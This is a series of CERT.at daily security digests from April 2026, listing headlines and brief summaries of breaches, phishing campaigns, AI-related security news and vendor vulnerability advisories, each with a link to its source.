=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 15-04-2026 18:00 − Thursday 16-04-2026 18:00
Handler: Felician Fuchs
Co-Handler: Guenes Holler
=====================
= News =
=====================
∗∗∗ NIST Updates NVD Operations to Address Record CVE Growth ∗∗∗
---------------------------------------------
NIST is changing the way it handles cybersecurity vulnerabilities and exposures, or CVEs, listed in its National Vulnerability Database (NVD). In the past, NIST’s NVD program aimed to analyze all CVEs to add details — such as severity scores and product lists — that help cybersecurity professionals prioritize and mitigate vulnerabilities. Going forward, NIST will add details, or “enrich,” those CVEs that meet certain criteria, which are explained below.
---------------------------------------------
https://www.nist.gov/news-events/news/2026/04/nist-updates-nvd-operations-a…
∗∗∗ New ATHR vishing platform uses AI voice agents for automated attacks ∗∗∗
---------------------------------------------
A new cybercrime platform called ATHR can harvest credentials via fully automated voice phishing attacks that use both human operators and AI agents for the social engineering phase.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-athr-vishing-platform-us…
∗∗∗ After Bluehammer: Frustrated researcher leaks another Windows exploit ∗∗∗
---------------------------------------------
Attackers can use the exploit to gain SYSTEM privileges on Windows systems because of a flaw in Defender. A patch is not yet in sight.
---------------------------------------------
https://www.golem.de/news/nach-bluehammer-frustrierter-forscher-leakt-weite…
∗∗∗ Cognitive debt: AI-generated software requires traditional practices ∗∗∗
---------------------------------------------
So that developers can continue to understand the code they generate with the help of AI, a return to traditional practices is recommended.
---------------------------------------------
https://www.golem.de/news/kognitive-schuld-ki-generierte-software-erfordert…
∗∗∗ [Guest Diary] Compromised DVRs and Finding Them in the Wild, (Thu, Apr 16th) ∗∗∗
---------------------------------------------
Security cameras are great at monitoring physical doors, but terrible at locking their own digital ones. Across the internet, thousands of unpatched DVRs sit publicly exposed, many guarded only by the default vendor passwords they shipped with. For threat actors, these are low-hanging fruit. This write-up details a recent two-second Telnet capture, providing a mechanical breakdown of how quickly an exposed camera system goes from online to fully compromised by bad actors.
---------------------------------------------
https://isc.sans.edu/diary/rss/32886
∗∗∗ Anthropic's Project Glasswing CVE tally is still anyone's guess ∗∗∗
---------------------------------------------
Like the majority of the companies participating, it remains a mystery. Last week, Anthropic surprised the world by declaring that its latest model, Mythos, is so good at finding vulns that it would create chaos if released. Now, under the title of Project Glasswing, over 50 selected companies and orgs are allowed to test the hyped-up LLM to find security holes in their own products. But just how many problems have they really discovered?
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2026/04/15/project_glas…
∗∗∗ A fake Slack download is giving attackers a hidden desktop on your machine ∗∗∗
---------------------------------------------
This trojanized Slack installer looks normal, but quietly gives attackers an invisible desktop to access your accounts and data. We take a deep dive into the attack.
---------------------------------------------
https://www.malwarebytes.com/blog/threat-intel/2026/04/a-fake-slack-downloa…
∗∗∗ Teen arrested in Northern Ireland over cyberattack on school network ∗∗∗
---------------------------------------------
A 16-year-old boy has been arrested in Northern Ireland after a cyberattack disrupted access to educational systems used by potentially hundreds of thousands of students.
---------------------------------------------
https://therecord.media/northern-ireland-cyberattack-arrest
∗∗∗ PowMix botnet targets Czech workforce ∗∗∗
---------------------------------------------
Cisco Talos discovered an ongoing malicious campaign, operating since at least December 2025, affecting a broader workforce in the Czech Republic with a previously undocumented botnet we call “PowMix.”
---------------------------------------------
https://blog.talosintelligence.com/powmix-botnet-targets-czech-workforce/
∗∗∗ Researchers Say Fiverr Left User Files Open to Google Search ∗∗∗
---------------------------------------------
Private Fiverr user documents, including tax records and IDs, were reportedly found in Google search results due to a storage configuration issue. Read more about the findings and the company’s response to the data exposure.
---------------------------------------------
https://hackread.com/fiverr-left-user-files-open-to-google-search/
∗∗∗ The German Cyber Criminal Überfall: Shifts in Europe's Data Leak Landscape ∗∗∗
---------------------------------------------
Germany has reclaimed its position as a primary focus for cyber extortion in Europe. While data leak site (DLS) posts rose almost 50% globally in 2025, Google Threat Intelligence (GTI) data shows that the surge is hitting German infrastructure harder and faster than its regional neighbors, marking a significant return to the high-pressure levels previously observed in the country during 2022 and 2023.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/europe-data-leak-l…
∗∗∗ "Power Off": BKA takes action against DDoS services ∗∗∗
---------------------------------------------
The Federal Criminal Police Office (BKA) and the Frankfurt Prosecutor General's Office, together with international partners, have taken action against so-called stresser services. There were arrests.
---------------------------------------------
https://heise.de/-11261177
∗∗∗ Europe's governments rely on their own messenger solutions ∗∗∗
---------------------------------------------
From Berlin to Brussels: governments are increasingly relying on their own messengers in order to reduce dependence on US platforms and security risks.
---------------------------------------------
https://heise.de/-11261147
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco: Critical code-injection vulnerabilities in ISE and more closed ∗∗∗
---------------------------------------------
Critical security vulnerabilities exist in Cisco's Identity Services Engine and in Webex. In total, the developers plug 10 security holes.
---------------------------------------------
https://www.heise.de/news/Cisco-Kritische-Codeschmuggel-Luecken-in-ISE-und-…
∗∗∗ Anonymizing Linux: Emergency update to Tails 7.6.2 closes Flatpak vulnerability ∗∗∗
---------------------------------------------
A security vulnerability in Flatpak is the trigger for an emergency update for the Linux distribution Tails, which enables anonymous browsing.
---------------------------------------------
https://www.heise.de/news/Anonymisierendes-Linux-Notfallupdate-auf-Tails-7-…
∗∗∗ Gimp: Version 3.2.2 closes code-injection vulnerability involving GIFs ∗∗∗
---------------------------------------------
Security vulnerabilities in Gimp allow malicious code to be injected using manipulated files such as GIFs. Version 3.2.2 closes them.
---------------------------------------------
https://heise.de/-11260619
∗∗∗ LWN: Security updates for Thursday ∗∗∗
---------------------------------------------
https://lwn.net/Articles/1067993/
∗∗∗ Drupal core - Moderately critical - Gadget Chain - SA-CORE-2026-002 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-core-2026-002
∗∗∗ Drupal core - Critical - Cross-site scripting - SA-CORE-2026-001 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-core-2026-001
∗∗∗ Drupal core - Moderately critical - Cross-site scripting - SA-CORE-2026-003 ∗∗∗
---------------------------------------------
https://www.drupal.org/sa-core-2026-003
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 14-04-2026 18:00 − Wednesday 15-04-2026 18:00
Handler: Felician Fuchs
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ Microsoft April 2026 Patch Tuesday fixes 167 flaws, 2 zero-days ∗∗∗
---------------------------------------------
Today is Microsoft's April 2026 Patch Tuesday with security updates for 167 flaws, including 2 zero-day vulnerabilities.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-april-2026-patch-…
∗∗∗ Over 100 Chrome extensions in Web Store target users' accounts and data ∗∗∗
---------------------------------------------
More than 100 malicious extensions in the official Chrome Web Store are attempting to steal Google OAuth2 Bearer tokens, deploy backdoors, and carry out ad fraud.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/over-100-chrome-extensions-i…
∗∗∗ Microsoft: April updates trigger BitLocker key prompts on some servers ∗∗∗
---------------------------------------------
Microsoft confirmed on Tuesday that some Windows Server 2025 devices will boot into BitLocker recovery after installing the April 2026 KB5082063 Windows security update.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-some-windows-serv…
∗∗∗ New PHP Composer Flaws Enable Arbitrary Command Execution — Patches Released ∗∗∗
---------------------------------------------
Two high-severity security vulnerabilities have been disclosed in Composer, a package manager for PHP, that, if successfully exploited, could result in arbitrary command execution. The vulnerabilities have been described as command ..
---------------------------------------------
https://thehackernews.com/2026/04/new-php-composer-flaws-enable-arbitrary.h…
∗∗∗ Actively Exploited nginx-ui Flaw (CVE-2026-33032) Enables Full Nginx Server Takeover ∗∗∗
---------------------------------------------
A recently disclosed critical security flaw impacting nginx-ui, an open-source, web-based Nginx management tool, has come under active exploitation in the wild. The vulnerability in question is CVE-2026-33032 (CVSS score: 9.8), an ..
---------------------------------------------
https://thehackernews.com/2026/04/critical-nginx-ui-vulnerability-cve.html
∗∗∗ Agents hooked into GitHub can steal creds – but Anthropic, Google, and Microsoft haven't warned users ∗∗∗
---------------------------------------------
Researchers who found the flaws scored beer money bounties and warn the problem is probably pervasive. Exclusive: Security researchers hijacked three popular AI agents that integrate with GitHub Actions by using a new type of prompt injection attack to steal API keys and access tokens, and the vendors who run the agents didn't disclose the problem.
---------------------------------------------
https://www.theregister.com/2026/04/15/claude_gemini_copilot_agents_hijacke…
∗∗∗ UK told its Big Tech habit is now a national security risk ∗∗∗
---------------------------------------------
Open Rights Group says years of reliance on US giants have left Britain exposed. Britain has spent years wiring its public sector into US Big Tech, and a new report says that dependence could quickly become a national security headache.
---------------------------------------------
https://www.theregister.com/2026/04/15/uk_big_tech_dependence/
∗∗∗ Ancient Excel bug comes out of retirement for active attacks ∗∗∗
---------------------------------------------
Vuln old enough to drive lands on CISA's exploited list. While Microsoft was rolling out its bumper Patch Tuesday updates this week, US cybersecurity agency CISA was readying an alert about a 17-year-old critical Excel flaw now under exploit.
---------------------------------------------
https://www.theregister.com/2026/04/15/excel_exploit/
∗∗∗ Fortinet plugs 18 security holes ∗∗∗
---------------------------------------------
Fortinet published a total of 18 security advisories in the night to Wednesday. Some of them address critical vulnerabilities.
---------------------------------------------
https://www.heise.de/news/Fortinet-stopft-18-Sicherheitslecks-11257883.html
∗∗∗ Booking.com: Unauthorized access by criminals discovered ∗∗∗
---------------------------------------------
Booking.com admits unauthorized third-party access to booking information. Affected customers are being informed and their PINs updated.
---------------------------------------------
https://www.heise.de/news/Booking-com-Unbefugte-Zugriffe-von-Kriminellen-en…
∗∗∗ Microsoft Office 2021: Support ends on 13 October 2026 ∗∗∗
---------------------------------------------
Microsoft reminds users that support for Office 2021 ends on 13 October 2026. There will be no Extended Security Updates (ESU).
---------------------------------------------
https://www.heise.de/news/Microsoft-Office-2021-Support-endet-am-13-Oktober…
∗∗∗ April Patch Tuesday fixes two zero-days, including one under active attack ∗∗∗
---------------------------------------------
This month’s Patch Tuesday addresses 167 vulnerabilities, including two zero-days that could lead to system compromise, data exposure, and privilege escalation.
---------------------------------------------
https://www.malwarebytes.com/blog/news/2026/04/april-patch-tuesday-fixes-tw…
∗∗∗ Sweden says pro-Russian hackers attempted to breach thermal power plant ∗∗∗
---------------------------------------------
A suspected pro-Russian hacker group attempted to disrupt operations at a thermal power plant in western Sweden last year, a Swedish defense official said.
---------------------------------------------
https://therecord.media/sweden-hackers-russia-power-plant
∗∗∗ The n8n n8mare: How threat actors are misusing AI workflow automation ∗∗∗
---------------------------------------------
Cisco Talos research has uncovered agentic AI workflow automation platform abuse in emails. Recently, we identified an increase in the number of emails that abuse n8n, one of these platforms, from as early as October 2025 through March 2026.
---------------------------------------------
https://blog.talosintelligence.com/the-n8n-n8mare/
∗∗∗ wolfSSL Vulnerability Hits IoT, Routers and Military Systems, Update to 5.9.1 Now ∗∗∗
---------------------------------------------
Critical wolfSSL flaw CVE-2026-5194 allows digital ID forgery across billions of devices, update to version 5.9.1 to fix the issue and reduce risk.
---------------------------------------------
https://hackread.com/wolfssl-vulnerability-iot-routers-military-systems/
∗∗∗ Adobe Patch Day: Critical malicious-code vulnerabilities threaten Photoshop & Co. ∗∗∗
---------------------------------------------
Important security updates close vulnerabilities in Adobe applications. Because many of the vulnerabilities are critical, admins should act promptly.
---------------------------------------------
https://heise.de/-11257985
∗∗∗ How to Harden GitHub Actions: An Updated Guide ∗∗∗
---------------------------------------------
Build resilient GitHub Actions workflows with lessons from recent attacks like TeamPCP and Axios.
---------------------------------------------
https://www.wiz.io/blog/github-actions-security-guide
=====================
= Vulnerabilities =
=====================
∗∗∗ Accessible private key of an X.509 certificate in SAP HANA Cockpit & SAP HANA Database Explorer ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/zugaenglicher-private…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 13-04-2026 18:00 − Tuesday 14-04-2026 18:00
Handler: Felician Fuchs
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Large gym chain: Cyberattack on Basic-Fit affects one million members ∗∗∗
---------------------------------------------
An unknown attacker broke into Basic-Fit's IT systems and retrieved large amounts of personal data of members from all over Europe.
---------------------------------------------
https://www.golem.de/news/grosse-gym-kette-cyberangriff-auf-basic-fit-betri…
∗∗∗ ASFINAG phishing: A fake email on the way to your credit card data ∗∗∗
---------------------------------------------
Caught driving without a vignette? Pay a replacement toll of 12.36 euros and the matter is settled? What looks at first glance like a genuine notification from ASFINAG is in fact a new phishing wave.
---------------------------------------------
https://www.watchlist-internet.at/news/asfinag-phishing-mail-kreditkartenda…
∗∗∗ The AI-Assisted Breach of Mexico's Government Infrastructure ∗∗∗
---------------------------------------------
In February, we published our initial findings on the AI-assisted breach of Mexico's government infrastructure, warning of the elevated risk that AI-powered threat actors now pose. A single operator used AI to breach nine Mexican government organizations and exfiltrate hundreds of millions of citizen records. Today, we release the full technical report.
---------------------------------------------
https://gambit.security/blog-post/a-single-operator-two-ai-platforms-nine-g…
∗∗∗ The “AI Vulnerability Storm”: Building a “Mythos-ready” Security Program ∗∗∗
---------------------------------------------
A briefing for security leaders on how AI-driven vulnerability discovery is reshaping the defender timeline, the operating model of vulnerability management, and the minimum actions required now.
---------------------------------------------
https://labs.cloudsecurityalliance.org/mythos-ciso/
∗∗∗ 108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure ∗∗∗
---------------------------------------------
Socket's Threat Research Team identified 108 malicious Chrome extensions operating as a coordinated campaign under a shared C2 infrastructure at cloudapi[.]stream. The extensions are published under five distinct publisher identities (Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt) and collectively account for approximately 20k Chrome Web Store installs. All 108 route stolen credentials, user identities, and browsing data to servers controlled by the same operator.
---------------------------------------------
https://socket.dev/blog/108-chrome-ext-linked-to-data-exfil-session-theft-s…
=====================
= Vulnerabilities =
=====================
∗∗∗ Critical flaw in wolfSSL library enables forged certificate use ∗∗∗
---------------------------------------------
A critical vulnerability in the wolfSSL SSL/TLS library can weaken security via improper verification of the hash algorithm or its size when checking Elliptic Curve Digital Signature Algorithm (ECDSA) signatures.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/critical-flaw-in-wolfssl-lib…
∗∗∗ SAP Patch Day: One critical SQL injection vulnerability – and 18 more ∗∗∗
---------------------------------------------
On its April Patch Day, SAP addresses vulnerabilities in 19 security notes. One critical one allows the injection of SQL commands.
---------------------------------------------
https://www.heise.de/news/SAP-Patchday-Eine-kritische-SQL-Injection-Luecke-…
∗∗∗ Attackers Actively Exploiting Critical Vulnerability in Kali Forms Plugin ∗∗∗
---------------------------------------------
Considering this vulnerability is under active attack, we urge users to ensure their sites are updated with the latest patched version of Kali Forms, version 2.4.10 at the time of this writing, as soon as possible.
---------------------------------------------
https://www.wordfence.com/blog/2026/04/attackers-actively-exploiting-critic…
∗∗∗ Fortinet: OS Command Injection through API endpoint ∗∗∗
---------------------------------------------
CVSSv3 Score: 9.1. An Improper Neutralization of Special Elements used in an OS Command (OS command injection) vulnerability [CWE-78] in FortiSandbox may allow an unauthenticated attacker to execute unauthorized code or commands via crafted HTTP requests.
---------------------------------------------
https://fortiguard.fortinet.com/psirt/FG-IR-26-100
∗∗∗ Fortinet: SQL Injection via API ∗∗∗
---------------------------------------------
CVSSv3 Score: 7.9. An improper neutralization of special elements used in an SQL command (SQL Injection) vulnerability [CWE-89] in FortiDDoS-F may allow an authenticated attacker to run arbitrary SQL queries on the database by sending crafted HTTP requests.
---------------------------------------------
https://fortiguard.fortinet.com/psirt/FG-IR-26-119
∗∗∗ Fortinet: Unauthenticated authentication bypass and privilege escalation in FortiSandbox ∗∗∗
---------------------------------------------
CVSSv3 Score: 9.1. A Path Traversal vulnerability [CWE-24] in the FortiSandbox JRPC API may allow an unauthenticated attacker to bypass authentication via specially crafted HTTP requests.
---------------------------------------------
https://fortiguard.fortinet.com/psirt/FG-IR-26-112
∗∗∗ April 2026 Security Update ∗∗∗
---------------------------------------------
Ivanti releases standard security patches on the second Tuesday of every month. Our vulnerability management program is central to our commitment to maintaining secure products. [..] To that end, today Ivanti is disclosing vulnerabilities in Ivanti Neurons for ITSM (on-premises and cloud).
---------------------------------------------
https://www.ivanti.com/blog/april-2026-security-update
∗∗∗ Someone Bought 30 WordPress Plugins and Planted a Backdoor in All of Them ∗∗∗
---------------------------------------------
Last week, I wrote about catching a supply chain attack on a WordPress plugin called Widget Logic. A trusted name, acquired by a new owner, turned into something malicious. It happened again. This time at a much larger scale.
---------------------------------------------
https://anchor.host/someone-bought-30-wordpress-plugins-and-planted-a-backd…
∗∗∗ LWN: Security updates for Tuesday ∗∗∗
---------------------------------------------
https://lwn.net/Articles/1067595/
=====================
= End-of-Day report =
=====================
Timeframe: Friday 10-04-2026 18:00 − Monday 13-04-2026 18:00
Handler: Michael Schlagenhaufer
Co-Handler: Alexander Riepl
=====================
= News =
=====================
∗∗∗ Critical Marimo pre-auth RCE flaw now under active exploitation ∗∗∗
---------------------------------------------
A critical pre-authentication remote code execution (RCE) vulnerability in Marimo is now under active exploitation, leveraged for credential theft.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/critical-marimo-pre-auth-rce…
∗∗∗ Data breach: Attackers misuse fresh booking data from Booking.com ∗∗∗
---------------------------------------------
There has apparently been a security incident at the travel booking platform Booking.com. The platform operator is currently informing its users by email about a possible misuse of their booking data. Users should expect contact attempts and payment demands from the attackers.
---------------------------------------------
https://www.golem.de/news/datenpanne-angreifer-missbrauchen-frische-buchung…
∗∗∗ Hungarian government creds left in the safe hands of FrankLampard ∗∗∗
---------------------------------------------
Hungary's government has discovered the hard way that the biggest threat to national security might just be its own password choices. An investigation by Bellingcat has uncovered close to 800 Hungarian government email and password pairings circulating in breach dumps, cutting across nearly every major ministry, from defense and foreign affairs to finance. [..] According to the analysis, officials were using their government email addresses to sign up for all sorts of third-party services, then reusing the same passwords across them. Once those sites were breached, the credentials ended up in the usual places.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2026/04/11/hungary_gove…
∗∗∗ Supply-Chain Attacks, TP-Link devices & a pair of socks ∗∗∗
---------------------------------------------
March 2026 was intense for cybersecurity teams across the globe. Within a three-week window, the industry observed three application-security companies compromised in supply-chain attacks using the same vector: poisoned GitHub Actions. [...] During our investigation we discovered connections between the Xygeni compromise and a separate campaign targeting IoT devices, connections that had previously gone unreported.
---------------------------------------------
https://ctrlaltintel.com/research/ProxyPCP/
∗∗∗ Rockstar confirms cyberattack and data theft ∗∗∗
---------------------------------------------
The well-known cybercrime group Shiny Hunters is extorting Rockstar Games on its website. Rockstar confirms a cyber incident. [..] The cyber gang ShinyHunters stated on its website that it had compromised Rockstar's Snowflake instances with the help of the third-party tool AnoDot. [..] And the incident at Rockstar Games may be the result of a cyberattack on AnoDot, also carried out by ShinyHunters.
---------------------------------------------
https://www.heise.de/news/Rockstar-bestaetigt-Cyberangriff-und-Datendiebsta…
∗∗∗ Tax office demands a data update? Beware of the phishing trap! ∗∗∗
---------------------------------------------
For many, the start of spring means: time for the tax return. Unfortunately, it also marks the start of high season for criminals who spread phishing messages in the name of the Ministry of Finance.
---------------------------------------------
https://www.watchlist-internet.at/news/finanzamt-fordert-datenupdate/
∗∗∗ GitHub Copilot vulnerability CVE-2025-59145 allows data extraction ∗∗∗
---------------------------------------------
The Copilot integrated into Microsoft's GitHub platform is once again causing trouble. There was a vulnerability, CVE-2025-59145, which with a CVSS score of 9.6 is already severe. Through the vulnerability, attackers can extract sensitive data from GitHub projects. Source code, API keys, cloud secrets, everything to be found in private GitHub repositories could be siphoned off. The vulnerability CVE-2025-59145, dubbed CamoLeak, became publicly known in October 2025 according to BlackFog.
---------------------------------------------
https://borncity.com/blog/2026/04/11/github-copilot-schwachstelle-cve-2025-…
∗∗∗ Just 21 IP Addresses Are Now Behind Nearly Half of All RDP Scanning on the Internet ∗∗∗
---------------------------------------------
GreyNoise uncovers a concentrated RDP scanning campaign, revealing infrastructure patterns, rapid traffic shifts that impact detection, and recommendations for defenders.
---------------------------------------------
https://www.greynoise.io/blog/ip-addresses-behind-nearly-half-rdp-internet-…
∗∗∗ "ClickFix" attacks on macOS now also via Script Editor ∗∗∗
---------------------------------------------
As Jamf Threat Labs writes in an analysis, the attackers lure their victims to a fake Apple website that claims to help free up storage space on the Mac. [..] What is interesting is that the installation chain bypasses the Terminal paste protection of macOS 26.4. Apple had introduced this protection feature to warn users about ClickFix attacks when they paste manipulated commands into the Terminal, although it does not always work either. By switching to Script Editor, this mechanism is apparently circumvented, according to Jamf.
---------------------------------------------
https://heise.de/-11251412
∗∗∗ Inside Predator’s kernel engine ∗∗∗
---------------------------------------------
In our previous research, we documented how Predator spyware evades iOS anti-analysis checks and defeats iOS recording indicators. Those posts revealed what Predator does — but not how it achieves the deep system access required to do it. This post answers that question.
---------------------------------------------
https://www.jamf.com/blog/predator-spyware-ios-kernel-exploitation-engine/
=====================
= Vulnerabilities =
=====================
∗∗∗ Severe security vulnerability in Adobe Reader - updates now available ∗∗∗
---------------------------------------------
Update, 13.04.2026: Adobe has since released a security update that fixes the problem. Administrators are urgently advised to install it as soon as possible.
---------------------------------------------
https://www.cert.at/de/aktuelles/2026/4/schwerwiegende-sicherheitslucke-in-…
∗∗∗ SSL configuration error endangers VMware Tanzu Spring Cloud Gateway ∗∗∗
---------------------------------------------
The developers state that they have closed the vulnerability (CVE-2026-22750, "high") in Spring Cloud Gateway 4.2.1 (Enterprise Support Only). So far there are no indications of attacks.
---------------------------------------------
https://www.heise.de/news/SSL-Konfigurationsfehler-gefaehrdet-VMware-Tanzu-…
∗∗∗ LWN: Security updates for Monday ∗∗∗
---------------------------------------------
https://lwn.net/Articles/1067436/
∗∗∗ Kubernetes: CVE-2026-3865 ∗∗∗
---------------------------------------------
https://github.com/kubernetes/kubernetes/issues/138319
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 09-04-2026 18:00 − Friday 10-04-2026 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Severe security vulnerability in Adobe Reader - actively exploited ∗∗∗
---------------------------------------------
A security researcher has discovered a severe vulnerability in Adobe Reader for which no update is yet available. To compromise a vulnerable system, it is enough for users to open a specially crafted PDF document; no further interaction is required. The vulnerability has been exploited since at least November 2025. A first PDF document exploiting the vulnerability appeared on VirusTotal on 28 November 2025.
---------------------------------------------
https://www.cert.at/de/aktuelles/2026/4/schwerwiegende-sicherheitslucke-in-…
∗∗∗ Malware: Website hosting CPUID, HWMonitor, CPU-Z etc. hacked ∗∗∗
---------------------------------------------
The website on which these tools were hosted and offered for download has presumably fallen victim to a hack. As a result of this hack, malware was/is being served when downloading from the web server. Anyone who recently downloaded tools such as CPUID, HWMonitor, CPU-Z etc. from that site could therefore have malware on their Windows system.
---------------------------------------------
https://borncity.com/blog/2026/04/10/malware-website-die-cpuid-hwmonitor-cp…
∗∗∗ Smart Slider updates hijacked to push malicious WordPress, Joomla versions ∗∗∗
---------------------------------------------
Hackers hijacked the update system for the Smart Slider 3 Pro plugin for WordPress and Joomla, and pushed a malicious version with multiple backdoors. [..] The developer says that only the Pro version 3.5.1.35 of the plugin is affected and recommends switching immediately to the latest version, currently 3.5.1.36, or 3.5.1.34 and earlier.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/smart-slider-updates-hijacke…
∗∗∗ Project Glasswing and open source software: The good, the bad, and the ugly ∗∗∗
---------------------------------------------
Anthropic describes Project Glasswing as a coalition of tech giants committing $100 million in AI resources to hunt down and fix long-hidden vulnerabilities in critical open source software that it's finding with its new Mythos AI program. Or as The Reg put it, "an AI model that can generate zero-day vulnerabilities." Oh boy! Just what we needed. Not just AI security bug slop, but automated, dedicated AI security bug slop!
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2026/04/10/project_glas…
∗∗∗ Anthropic AI Mythos: Urgent warning to US banks, BSI expects upheaval ∗∗∗
---------------------------------------------
US Treasury Secretary Scott Bessent and Federal Reserve Chairman Jerome Powell summoned the heads of the most important US banks to an unusually urgent meeting on Tuesday to warn of the dangers of Anthropic's new AI model Claude Mythos Preview. Bloomberg reports this, citing people familiar with the matter. The meeting, called at short notice, is a sign that US regulators count the possibility of a new kind of cyberattack among the biggest risks for the financial industry, the financial news platform summarises.
---------------------------------------------
https://www.heise.de/news/Anthropic-KI-Mythos-Dringende-Warnung-an-US-Banke…
∗∗∗ France's plan: away from Windows, towards Linux ∗∗∗
---------------------------------------------
France's public administration is to move away from Windows and US tools: the government presents a concrete roadmap for digital sovereignty.
---------------------------------------------
https://heise.de/-11251566
∗∗∗ 99 percent want digital independence – 6 percent use AI from the EU ∗∗∗
---------------------------------------------
Almost all Germans want digital independence, yet only few use European alternatives. A Bitkom survey shows the gap.
---------------------------------------------
https://heise.de/-11252308
∗∗∗ Google Chrome adds infostealer protection against session cookie theft ∗∗∗
---------------------------------------------
Google has rolled out Device Bound Session Credentials (DBSC) protection in Chrome 146 for Windows, designed to block info-stealing malware from harvesting session cookies.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/google-chrome-adds-infosteal…
∗∗∗ No microphone needed: New spying technique abuses fiber-optic cables as a bug ∗∗∗
---------------------------------------------
The attack is based on the fact that sound waves acting on fiber-optic lines cause microscopic deformations. [..] One of the strengths of a fiber-optic line is that, compared to a classic copper line, it is less susceptible to electromagnetic interference.
---------------------------------------------
https://www.golem.de/news/mikrofon-nicht-noetig-neue-spionagetechnik-missbr…
∗∗∗ Several dozen high-value corporations hit by new extortion crew in helpdesk phishing spree ∗∗∗
---------------------------------------------
A new extortion crew has targeted “several dozen high-value” corporations through phishing and helpdesk social-engineering, according to Google. [..] "The campaign relies on social engineering via live chat to direct employees to malicious, spoofed Okta login pages," Larsen said.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2026/04/09/several_doze…
∗∗∗ APT28 exploit routers to enable DNS hijacking operations ∗∗∗
---------------------------------------------
The UK National Cyber Security Centre (NCSC) is providing details of tactics, techniques and procedures (TTPs) associated with APT28’s exploitation of routers to enable DNS hijacking operations.
---------------------------------------------
https://www.ncsc.gov.uk/news/apt28-exploit-routers-to-enable-dns-hijacking-…
∗∗∗ Raiffeisen phishing: data theft instead of loyalty gift ∗∗∗
---------------------------------------------
Quickly redeem Raiffeisen loyalty points before they expire? Don't! Behind a currently circulating SMS message hides nothing other than a well-known phishing attempt in a new guise.
---------------------------------------------
https://www.watchlist-internet.at/news/raiffeisen-phishing-treuegeschenke/
=====================
= Vulnerabilities =
=====================
∗∗∗ GitLab Patch Release: 18.10.3, 18.9.5, 18.8.9 ∗∗∗
---------------------------------------------
Today, we are releasing versions 18.10.3, 18.9.5, 18.8.9 for GitLab Community Edition (CE) and Enterprise Edition (EE). These versions contain important bug and security fixes, and we strongly recommend that all self-managed GitLab installations be upgraded to one of these versions immediately.
---------------------------------------------
https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-r…
∗∗∗ Synology-SA-26:05 Synology SSL VPN Client ∗∗∗
---------------------------------------------
Synology has released a security update for the Synology SSL VPN Client utility to address vulnerabilities: CVE-2021-47960 allows remote attackers to access sensitive files from the SSL VPN Client installation directory via a local HTTP service when a user interacts with a crafted web page. CVE-2021-47961 allows remote attackers to obtain or manipulate the PIN code in SSL VPN Client, potentially leading to unauthorized VPN configuration and traffic interception when a user interacts with a crafted web page.
---------------------------------------------
https://www.synology.com/en-global/support/security/Synology_SA_26_05
∗∗∗ Wasmtime's April 9, 2026 Security Advisories ∗∗∗
---------------------------------------------
https://bytecodealliance.org/articles/wasmtime-security-advisories
∗∗∗ LWN: Security updates for Friday ∗∗∗
---------------------------------------------
https://lwn.net/Articles/1067200/
∗∗∗ Tenable: [R1] Stand-alone Security Patch Available for Tenable Security Center Versions 6.5.1, 6.6.0, 6.7.2 and 6.8.0: SC202604.1 ∗∗∗
---------------------------------------------
https://www.tenable.com/security/tns-2026-10
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 08-04-2026 18:00 − Thursday 09-04-2026 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Opening a PDF is enough: Unpatched vulnerability in Adobe Reader exploited for months ∗∗∗
---------------------------------------------
Attackers have been exploiting a zero-day vulnerability in Adobe Reader since late 2025 to steal data and inject malicious code. [..] According to Li, the exploit also works with the latest Adobe Reader version. Adobe is said to have already been informed about the zero-day. It will probably be a few more days before a fix is available.
---------------------------------------------
https://www.golem.de/news/pdf-oeffnen-reicht-ungepatchte-luecke-in-adobe-re…
∗∗∗ 13-year-old bug in ActiveMQ lets hackers remotely execute commands ∗∗∗
---------------------------------------------
Security researchers discovered a remote code execution (RCE) vulnerability in Apache ActiveMQ Classic that has gone undetected for 13 years and could be exploited to execute arbitrary commands. The flaw was uncovered using the Claude AI assistant, which identified an exploit path by analyzing how independently developed components interact. [..] The researcher reported the vulnerability to Apache maintainers on March 22, and the developer addressed it on March 30 in ActiveMQ Classic versions 6.2.3 and 5.19.4.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/13-year-old-bug-in-activemq-…
∗∗∗ Hackers use pixel-large SVG trick to hide credit card stealer ∗∗∗
---------------------------------------------
A massive campaign impacting nearly 100 online stores using the Magento e-commerce platform hides credit card-stealing code in a pixel-sized Scalable Vector Graphics (SVG) image. When clicking the checkout button, the victim is shown a convincing overlay that can validate card details and billing data.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-use-pixel-large-svg-…
